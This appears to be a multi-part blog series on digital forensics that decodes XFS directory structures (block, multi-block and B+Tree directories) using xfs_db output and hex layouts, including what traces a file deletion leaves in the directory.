The rest of the space in the data fork is divided into two arrays for tracking sub-nodes. The first array is made up for four byte logical offset values, tracking where each chunk of file data belongs. The second array is the absolute block address of the node which tracks the extents at the corresponding logical offset. In our case that block is 0x8118e4 = 8460516 (aka relative block 71908 in AG 2), which tracks the extents starting from the start of the file (logical offset zero).

This is a small file system and the absolute block addresses fit in 32 bits. What’s not clear in the documentation is what happens when the file system is large enough to require 64-bit block addresses? More research is needed here.

Let’s examine block 8460516 which holds the extent information. Here are the first 256 bytes in a hex editor:

B+Tree Directory Leaf

0-3     Magic number                        BMA3
4-5     Level in tree                       0 (leaf node)
6-7     Number of extents                   42
8-15    Left sibling pointer                -1 (NULL)

16-23   Right sibling pointer               -1 (NULL)
24-31   Sector offset of this block         0x02595720 = 39409440

32-39   LSN of last update                  0x200000631b
40-55   UUID                                e56c...da71
56-63   Inode owner of this block           0x022f4d7d = 36654461

64-67   CRC32 of this block                 0x9d14d936
68-71   Padding for 64-bit alignment        zeroed

This node is at level zero in the tree, which means it’s a leaf node containing data. In this case the data is extent structures, and there are 42 of them following the header.

If there were more than one leaf node, the left and right sibling pointers would be used. Since we only have the one leaf, both of these values are set to -1, which is used as a NULL pointer in XFS metadata structures.

As far as decoding the extent structures, it’s easier to use xfs_db:

xfs_db> inode 36654461
xfs_db> addr u3.bmbt.ptrs[1]
xfs_db> print
magic = 0x424d4133
level = 0
numrecs = 42
leftsib = null
rightsib = null
bno = 39409440
lsn = 0x200000631b
uuid = e56c3b41-ca03-4b41-b15c-dd609cb7da71
owner = 36654461
crc = 0x9d14d936 (correct)
recs[1-42] = [startoff,startblock,blockcount,extentflag] 
1:[0,4581802,1,0] 
2:[1,4581800,1,0] 
3:[2,4581799,1,0] 
4:[3,4581798,1,0] 
5:[4,4581794,1,0] 
6:[5,4581793,1,0] 
7:[6,4581791,1,0] 
8:[7,4581790,1,0] 
9:[8,4581789,1,0] 
10:[9,4581787,1,0] 
11:[10,4581786,1,0] 
12:[11,4582219,1,0] 
13:[12,4582236,1,0] 
14:[13,4587210,1,0] 
15:[14,4688117,3,0] 
16:[17,4695931,1,0] 
17:[18,4695948,1,0] 
18:[19,4701245,1,0] 
19:[20,4703737,1,0] 
20:[21,4706394,1,0] 
21:[22,4711526,1,0] 
22:[23,4714191,1,0] 
23:[24,4721971,1,0] 
24:[25,4729743,1,0] 
25:[26,4740155,1,0] 
26:[27,4742820,1,0] 
27:[28,4745312,1,0] 
28:[29,4747961,1,0] 
29:[30,4753101,1,0] 
30:[31,4761038,1,0] 
31:[32,4768818,1,0] 
32:[33,4776747,1,0] 
33:[34,4797727,1,0] 
34:[8388608,4581801,1,0] 
35:[8388609,4581796,1,0] 
36:[8388610,4581795,1,0] 
37:[8388611,4581792,1,0] 
38:[8388612,4581788,1,0] 
39:[8388613,8459337,1,0] 
40:[8388614,8460517,2,0] 
41:[8388616,8682827,7,0] 
42:[16777216,4581797,1,0]

As we saw in the previous installment, multi-block directories in XFS are sparse files:

  • Starting at logical offset zero, we have extents 1-33 containing the first 35 blocks of the directory file. This is where the directory entries live.
  • Extents 34-41 starting at logical offset 8388608 (XFS_DIR2_LEAF_OFFSET) contain the hash lookup table for finding directory entries.
  • Because the hash lookup table is large enough to require multiple blocks, the “tail record” for the directory moves into its own block tracked by the final extent (extent 42 in our example above). The logical offset for the tail record is 2*XFS_DIR2_LEAF_OFFSET or 16777216.

The Tail Record

0-3      Magic number                       XDF3
4-7      CRC32 checksum                     0xf56e9aba
8-15     Sector offset of this block        22517032

16-23    Last LSN update                    0x200000631b
24-39    UUID                               e56c...da71
40-47    Inode that points to this block    0x022f4d7d

48-51    Starting block offset              0
52-55    Size of array                      35
56-59    Array entries used                 35
60-63    Padding for 64-bit alignment       zeroed

The last two fields describe an array whose elements correspond to the blocks in the hash lookup table for this directory. The array itself follows immediately after the header as shown above. Each element of the array is a two-byte number representing the largest chunk of free space available in each block. In our example, all of the blocks are full (zero free bytes) except for the last block which has at least a 0x0440 = 1088 byte chunk available.

Decoding the Hash Lookup Table

The hash lookup table for this directory is contained in the fifteen blocks starting at logical file offset 8388608. Because the hash lookup table spans multiple blocks, it is also formatted as a B+Tree. The initial block at logical offset 8388608 should be the root of this tree. This block is shown below.

0-3      "Forward" pointer                  0
4-7      "Back" pointer                     0
8-9      Magic number                       0x3ebe
10-11    Padding for alignment              zeroed
12-15    CRC32 checksum                     0x129cf461

16-23    Sector offset of this block        22517064
24-31    LSN of last update                 0x200000631b

32-47    UUID                               e56c...da71

48-55    Parent inode                       0x022f4d7d
56-57    Number of array entries            14
58-59    Level in tree                      1
59-63    Padding for alignment              zeroed

We confirm this is an interior node of a B+Tree by looking at the “Level in tree” value at bytes 58-59– interior nodes have non-zero values here. The “forward” and “back” pointers being zeroed mean there are no other nodes at this level, so we’re sitting at the root of the tree.

The fourteen other blocks that hold the directory entries are tracked by an array here in the root block. Bytes 56-57 track the size of the array, and the array itself starts at byte 64. Each array entry contains a four byte hash value and a four byte logical block offset. The hash value in each array entry is the largest hash value in the given block.

It’s easier to decode these values using xfs_db:

xfs_db> fsblock 4581801
xfs_db> type dir3
xfs_db> p
nhdr.info.hdr.forw = 0
nhdr.info.hdr.back = 0
nhdr.info.hdr.magic = 0x3ebe
nhdr.info.crc = 0x129cf461 (correct)
nhdr.info.bno = 22517064
nhdr.info.lsn = 0x200000631b
nhdr.info.uuid = e56c3b41-ca03-4b41-b15c-dd609cb7da71
nhdr.info.owner = 36654461
nhdr.count = 14
nhdr.level = 1
nbtree[0-13] = [hashval,before]
0:[0x4863b0b3,8388610]
1:[0x4a63d132,8388619]
2:[0x4c63d1f3,8388615]
3:[0x4e63f070,8388622]
4:[0x9c46fd6d,8388612]
5:[0xa446fd6d,8388621]
6:[0xac46fd6d,8388618]
7:[0xb446fd6d,8388616]
8:[0xbc275ded,8388614]
9:[0xbc777c6d,8388609]
10:[0xc463d170,8388611]
11:[0xc863f170,8388620]
12:[0xcc63d072,8388613]
13:[0xce63f377,8388617]

If you look at the residual data in the block after the hash array, it looks like hash values and block offsets similar to what we’ve seen in previous installments. I speculate that this is residual data from when the hash lookup table was able to fit into a single block. Once the directory grew to a point where the B+Tree was necessary, the new B+Tree root node simply took over this block, leaving a significant amount of residual data in the slack space.

To understand the function of the leaf nodes in the B+Tree, suppose we wanted to find the directory entry for the file “0003_smallfile”. First we can use xfs_db to compute the hash value for this filename:

xfs_db> hash 0003_smallfile
0xbc07fded

According to the array, that hash value should be in logical block 8388614. We then have to refer back to the list of extents we decoded earlier to discover that this local offset corresponds to block address 8460517 (AG 2, block 71909). Here is the breakdown of that block:

0-3      Forward pointer                    0x800001 = 8388609
4-7      Back pointer                       0x800008 = 8388616
8-9      Magic number                       0x3dff
10-11    Padding for alignment              zeroed
12-15    CRC32 checksum                     0xdb227061

16-23    Sector offset of this block        39409448
24-31    LSN of last update                 0x200000631b

32-47    UUID                               e56c...da71

48-55    Parent inode                       0x022f4d7d
56-57    Number of array entries            0x01a0 = 416
58-59    Unused entries                     0
59-63    Padding for alignment              zeroed

Following the 64-byte header is an array holding the hash lookup structures. Each structure contains a four byte hash value and a four byte offset. The array is sorted by hash value for binary search. Offsets are in 8 byte units.

The has value for “0003_smallfile” was 0xbc07fded. We have to look fairly far down in the array to find the offset for this value:

The offset tells us that the directory entry of “0003_smallfile” should be 0x13 = 19 * 8 = 152 bytes from the start of the directory file. That puts it near the beginning of the first block at logical offset zero.

The Directory Entries

To find the first block of the directory file we need to refer back to the extent list we decoded from the inode at the very start of this article. According to that list, the initial block is 4581802 (AG 1, block 387498). Let’s take a closer look at this block:

0-3      Magic number                       XDD3
4-7      CRC32 checksum                     0xaf173b31
8-15     Sector offset to this block        22517072

16-23    LSN of last update                 0x200000631b
24-39    UUID                               e56c...da71
40-47    Parent inode                       0x022f4d7d

Bytes 48-59 are a three element array indicating where there is available free space in this directory. Each array element is a 2 byte offset (in bytes) to the free space and a 2 byte length (in bytes). There is no free space in this block, so all array entries are zeroed. Bytes 60-63 are padding for alignment.

Following this header are variable length directory entries defined as follows:

     Len (bytes)     Field
     ===========     ======
       8             absolute inode number
       1             file name length (bytes)
       varies        file name
       1             file type
       varies        padding as necessary for 64bit alignment
       2             offset to beginning of this entry

Here is the decoding of the directory entries shown above:

    Inode        Len    File Name         Type    Offset
    =====        ===    =========         ====    ========
    0x022f4d7d    1     .                 2       0x0040
    0x04159fa1    2     ..                2       0x0050
    0x022f4d7e   14     0001_smallfile    1       0x0060
    0x022f4d7f   12     0002_bigfile      1       0x0080
    0x022f4d80   14     0003_smallfile    1       0x0098
    0x022f4d81   12     0004_bigfile      1       0x00B8

File type bytes are as described in Part Three of this series (1 is a regular file, 2 is a directory). Note that the starting offset of the “0003_smallfile” entry is 152 bytes (0x0098), exactly as the hash table lookup told us.

What Happens Upon Deletion?

Let’s see what happens when we delete “0003_smallfile”. When doing this sort of testing, always be careful to force the file system cache to flush to disk before busting out the trusty hex editor:

# rm -f /root/dir-testing/bigdir/0003_smallfile
# sync; echo 3 > /proc/sys/vm/drop_caches

The mtime and ctime in the directory inode are set to the deletion time of “0003_smallfile”. The LSN and CRC32 checksum in the inode are also updated.

The removal of a single file is typically not a big enough event to modify the size of the directory. In this case, neither the extent tree root or leaf block changes. We would have to purge a significant number of files the impact this data.

However, the “tail record” for the directory is impacted by the file deletion.

The CRC32 checksum and LSN (now highlighted in red) are updated. Also the free space array now shows 0x20 = 32 bytes free in the first block.

Again, a single file deletion is not significant enough to impact the root of the hash B+Tree. However, one of the leaf nodes does register the change.

Again we see updates to the CRC32 checksum and LSN fields. The “Unused entries” field for the hash array now shows one unused entry. Looking farther down in the block, we find the unused entry for our hash 0xbc07fded. The offset is zeroed to indicate this entry is unused. We saw similar behavior in other block-based directories in previous installments of this series.

Changes to the directory entries are also similar to the behavior we’ve seen previously for block-based directory files:

Again we see the usual CRC32 and LSN updates. But now the free space array starting at byte 48 shows 0x0020 = 32 bytes free at offset 0x0098 = 152. The first two bytes of the inode field in this directory are overwritten with 0xFFFF to indicate the unused space, and the next two bytes indicate 0x0020 = 32 bytes of free space. However, since the inodes in this file system fit in 32 bits, the original inode number for the file is still fully visible and the file could potentially be recovered using residual data in the inode.

Wrapping Up and Planning for the Future

This post concludes my walk-through of the major on-disk data structures in the XFS file system. If anything was unclear or you want more detailed explanations in any area, feel free to reach me through the comments or via any of my social media accounts.

The colorized hex dumps that appear in these posts where made with a combination of Synalize It! and Hexinator. Along the way I created “grammar” files that you can use to produce similar colored breakdowns on your own XFS data structures.

I have multiple pages of research questions that came up as I was working through this series. But what I’m most interested in at the moment is the process of recovering deleted data from XFS file systems. This is what I will be looking at in upcoming posts.

XFS (Part 5) – Multi-Block Directories

Life gets more interesting when directories get large enough to occupy multiple blocks. Let’s take a look at my /etc directory:

[root@localhost hal]# ls -lid /etc
67146849 drwxr-xr-x. 141 root root 8192 May 26 20:37 /etc

The file size is 8192 bytes, or two 4K blocks.

Now we’ll use xfs_db to get more information:

xfs_db> inode 67146849
xfs_db> print
[...]
core.size = 8192
core.nblocks = 3
core.extsize = 0
core.nextents = 3
[...]
u3.bmx[0-2] = [startoff,startblock,blockcount,extentflag] 
0:[0,8393423,1,0] 
1:[1,8397532,1,0] 
2:[8388608,8394766,1,0]
[...]

I’ve removed much of the output here to make things more readable. The directory file is fragmented, requiring multiple single-block extents, which is common for directories in XFS. The directory would start as a single block. Eventually enough files will be added to the directory that it needs more than one block to hold all the file entries. But by this time, the blocks immediately following the original directory block have been consumed– often by the files which make up the content of the directory. When the directory needs to grow, it typically has to fragment.

What is really interesting about multi-block directories in XFS is that they are sparse files. Looking at the list of extents at the end of the xfs_db output, we see that the first two blocks are at logical block offsets 0 and 1, but the third block is at logical block offset 8388608. What the heck is going on here?

If you recall from our discussion of block directories in the last installment, XFS directories have a hash lookup table at the end for faster searching. When a directory consumes multiple blocks, the hash lookup table and “tail record” move into their own block. For consistency, XFS places this information at logical offset XFS_DIR2_LEAF_OFFSET, which is currently set to 32GB. 32GB divided by our 4K block size gives a logical block offset of 8388608.

From a file size perspective, we can see that xfs_db agrees with our earlier ls output, saying the directory is 8192 bytes. However, the xfs_db output clearly shows that the directory consumes three blocks, which should give it a file size of 3*4096 = 12288 bytes. Based on my testing, the directory “size” in XFS only counts the blocks that contain directory entries.

We can use xfs_db to examine the directory data blocks in more detail:

xfs_db> addr u3.bmx[0].startblock
xfs_db> print
dhdr.hdr.magic = 0x58444433 ("XDD3")
dhdr.hdr.crc = 0xe3a7892d (correct)
dhdr.hdr.bno = 38872696
dhdr.hdr.lsn = 0x2200007442
dhdr.hdr.uuid = e56c3b41-ca03-4b41-b15c-dd609cb7da71
dhdr.hdr.owner = 67146849
dhdr.bestfree[0].offset = 0x220
dhdr.bestfree[0].length = 0x8
dhdr.bestfree[1].offset = 0x258
dhdr.bestfree[1].length = 0x8
dhdr.bestfree[2].offset = 0x368
dhdr.bestfree[2].length = 0x8
du[0].inumber = 67146849
du[0].namelen = 1
du[0].name = "."
du[0].filetype = 2
du[0].tag = 0x40
du[1].inumber = 64
du[1].namelen = 2
du[1].name = ".."
du[1].filetype = 2
du[1].tag = 0x50
du[2].inumber = 34100330
du[2].namelen = 5
du[2].name = "fstab"
du[2].filetype = 1
du[2].tag = 0x60
du[3].inumber = 67146851
du[3].namelen = 8
du[3].name = "crypttab"
[...]

I’m using the addr command in xfs_db to select the startblock value from the first extent in the array (the zero element of the array).

The beginning of this first data block is nearly identical to the block directories we looked at previously. The only difference is that single block directories have a magic number “XDB3”, while data blocks in multi-block directories use “XDD3” as we see here. Remember that the value that xfs_db lobels dhdr.hdr.bno is actually the sector offset to this block and not the block number.

Let’s look at the next data block:

xfs_db> inode 67146849
xfs_db> addr u3.bmx[1].startblock
xfs_db> print
dhdr.hdr.magic = 0x58444433 ("XDD3")
dhdr.hdr.crc = 0xa0dba9dc (correct)
dhdr.hdr.bno = 38905568
dhdr.hdr.lsn = 0x2200007442
dhdr.hdr.uuid = e56c3b41-ca03-4b41-b15c-dd609cb7da71
dhdr.hdr.owner = 67146849
dhdr.bestfree[0].offset = 0xad8
dhdr.bestfree[0].length = 0x20
dhdr.bestfree[1].offset = 0xc18
dhdr.bestfree[1].length = 0x20
dhdr.bestfree[2].offset = 0xd78
dhdr.bestfree[2].length = 0x20
du[0].inumber = 67637117
du[0].namelen = 10
du[0].name = "machine-id"
du[0].filetype = 1
du[0].tag = 0x40
du[1].inumber = 67146855
du[1].namelen = 9
du[1].name = "localtime"
[...]

Again we see the same header information. Note that each data block has it’s own “free space” array, tracking available space in that data block.

Finally, we have the block containing the hash lookup table and tail record. We could use xfs_db to decode this block, but it turns out that there are some interesting internal structures to see here. Here’s the hex editor view of the start of the block:

Extent Directory Tail Block:

0-3     Forward link                        0
4-7     Backward link                       0
8-9     Magic number                        0x3df1
10-11   Padding                             zeroed
12-15   CRC32                               0xef654461

16-23   Sector offset                       38883440
24-31   Log seq number last update          0x2200008720
32-47   UUID                                e56c3b41-...-dd609cb7da71
48-55   Inode number                        67146849

56-57   Number of entries                   0x0126 = 294
58-59   Unused entries                      1
60-63   Padding for alignment               zeroed

The “forward” and “backward” links would come into play if this were a multi-node B+Tree data structure rather than a single block. Unlike previous magic number values, the magic value here (0x3df1) does not correspond to printable ASCII characters.

After the typical XFS header information, there is a two-byte value tracking the number of entries in the directory, and therefore the number of entries in the hash lookup table that follows. The next two bytes tell us that there is one unused entry– typically a record for a deleted file.

We find this unused record near the end of the hash lookup array. The entry starting at block offset 0x840 has an offset value of zero, indicating the entry is unused:

Extent Directory Tail block 0x820

Interestingly, right after the end of the hash lookup array, we see what appears to be the extended attribute information from an inode. This is apparently residual data left over from an earlier use of the block.

At the end of the block is data which tracks free space in the directory:

Extent Directory Tail Block 0xFFF

The last four bytes in the block are the number of blocks containing directory entries– two in this case. Preceding those four bytes is a “best free” array that tracks the length of the largest chunk of free space in each block. You will notice that the array values here correspond to the dhdr.bestfree[0].length values for each block in the xfs_db output above. When new directory entries are added, this array helps the file system locate the best spot to place the new entry.

We see the two bytes immediately before the “best free” array are identical to the first entry in the array. Did the /etc directory once consume three blocks and later shrink back to two? Based on limited testing, this appears to be the case. Unlike directories in traditional Unix file systems, which never shrink once blocks have been allocated, XFS directories will grow and shrink dynamically as needed.

So far we’ve looked at the three most common directory types in XFS: small “short form” directories stored in the inode, single block directories, and in this case a multi-block directories tracked with an extent array in the inode. In rare cases, when the directory is very large and very fragmented, the extent array in the inode is insufficient. In these cases, XFS uses a B+Tree to track the extent information. We will examine this scenario in the next installment.

 

XFS (Part 4) – Block Directories

In the previous installment, we looked at small directories stored in “short form” in the inode. While these small directories can make up as much as 90% of the total directories in a typical Linux file system, eventually directories get big enough that they can no longer be packed into the inode data fork. When this happens, directory data moves out to blocks on disk.

In the inode, the data fork type (byte 5) changes to indicate that the data is no longer stored within the inode. Extents are used to track the location of the disk blocks containing the directory data. Here is the inode core and extent list for a directory that only occupies a single block:

Inode detail for directory occupying a single block

The data fork type is 2, indicating an extent list follows the inode core. Bytes 76-79 indicate that there is only a single extent. The extent starts at byte 176 (0x0B0), immediately after the inode core. The last 21 bits of the extent structure show that the extent only contains a single block. Parsing the rest of the extent yields a block address of  0x8118e7, or relative block 71911 in AG 2.

We can extract this block and examine it in our hex editor. Here is the data in the beginning of the block:

Block Directory Header and Entries

The directory block begins with a 48 byte header:

0-3      Magic number                       XDB3
4-7      CRC32 checksum                     0xaf6a416d
8-15     Sector offset of this block        39409464

16-23    Last LSN update                    0x20000061fe
24-39    UUID                               e56c3b41-...-dd609cb7da71
40-47    inode that points to this block    0x0408e66d

You may compare the UUID and inode values in the directory block header with the corresponding values in the inode to see that they match.

The XFS documentation describes the sector offset field as the “block number”. However, using the formula from Part 1 of this series, we can calculate the physical block number of this block as:

(AG number) * (blocks per AG) + (relative block offset)
     2      *    2427136      +         71911   =   4926183

Multiply the block offset 4926183 by 8 sectors per block to get the sector offset value 39409464 that we see in the directory block header.

Following the header is a “free space” array that consumes 12 bytes, plus 4 bytes of padding to preserve 64-bit alignment. The free space array contains three elements which indicate where the three largest chunks of unused space are located in this directory block. Each element is a 2 byte offset and a 2 byte length field. The elements of the array are sorted in descending order by the length of each chunk.

In this directory block, there is only a single chunk of free space, starting at offset 1296 (0x0510) and having 2376 bytes (0x0948) of space. The other elements of the free space array are zeroed, indicating no other free space is available.

The directory entries start at byte 64 (0x040) and can be read sequentially like a typical Unix directory. However, XFS uses a hash-based lookup table, growing up from the bottom of the directory block, for more efficient searching:

Block Directory Tail Record and Hash Array

The last 8 bytes of the directory block are a “tail record” containing two 4 byte values: the number of directory entries (0x34 or 52) and the number of unused entries (zero). Immediately preceding the tail record will be an array of 8 byte records, one record per directory entry (52 records in this case). Each record contains a hash value computed from the file name, and the offset in the directory block where the directory entry for that file is located. The array is sorted by hash value so that binary search can quickly find the desired record. The offsets are in 8 byte units.

The xfs_db program can compute hash values for us:

xfs_db> hash 03_smallfile
0x3f07fdec

If we locate this hash value in the array, we see the byte offset value is 0x12 or 18. Since the offset units are 8 bytes, this translates to byte offset 144 (0x090) from the start of the directory block.

Here are the first six directory entries from this block, including the entry for “03_smallfile”:

Directory Entry Detail

Directory entries are variable length, but always 8 byte (64-bit) aligned. The fields in each directory entry are:

     Len (bytes)       Field
     ===========       =====
          8            Inode number
          1            File name length
          varies       File name
          1            File type
          varies       Padding for alignment
          2            Byte offset of this directory entry

64-bit inode addresses are always used. This is different from “short form” directories, where 32-bit inode addresses will be used if possible.

File name length is a single byte, limiting file names to 255 characters. The file type byte uses the same numbering scheme we saw in “short form” directories:

    1   Regular file
    2   Directory
    3   Character special device
    4   Block special device
    5   FIFO
    6   Socket
    7   Symlink

Padding for alignment is only included if necessary. Our “03_smallfile” entry starting at offset 0x090 is exactly 24 bytes long and needs no padding for alignment. You can clearly see the padding in the “.” and “..” entries starting at offset 0x040 and 0x050 respectively.

Deleting a File

If we remove “03_smallfile” from this directory, the inode updates similarly to what we saw with the “short form” directory in the last installment of this series. The mtime and ctime values are updated, and the CRC32 and Logfile Sequence Number fields as well. The file size does not change, since the directory still occupies one block.

The “tail record” and hash array at the end of the directory block change:

Tail record and hash array post delete

The tail record still shows 34 entries, but one of them is now unused. If we look at the entry for hash 0x3F07FDEC, we see the offset value has been zeroed, indicating an unused record.

We also see changes at the beginning of the block:

Directory entry detail post delete

The free space array now uses the second element, showing 24 (0x18) bytes free at byte offset 0x90– the location where the “03_smallfile” entry used to reside.

Looking at offset 0x90, we see that the first two bytes of the inode field are overwritten with 0xFFFF, indicating an unused entry. The next two bytes are the length of the free space. Again we see 0x18, or 24 bytes.

However, since inode addresses in this file system fit in 32 bits, the original inode address associated with this file is still clearly visible. The rest of the original directory entry is untouched until a new entry overwrites this space. This should make file recovery easier.

Not Quite Done With Directories

When directories get large enough to occupy multiple blocks, the directory structure gets more complicated. We’ll examine larger directories in our next installment.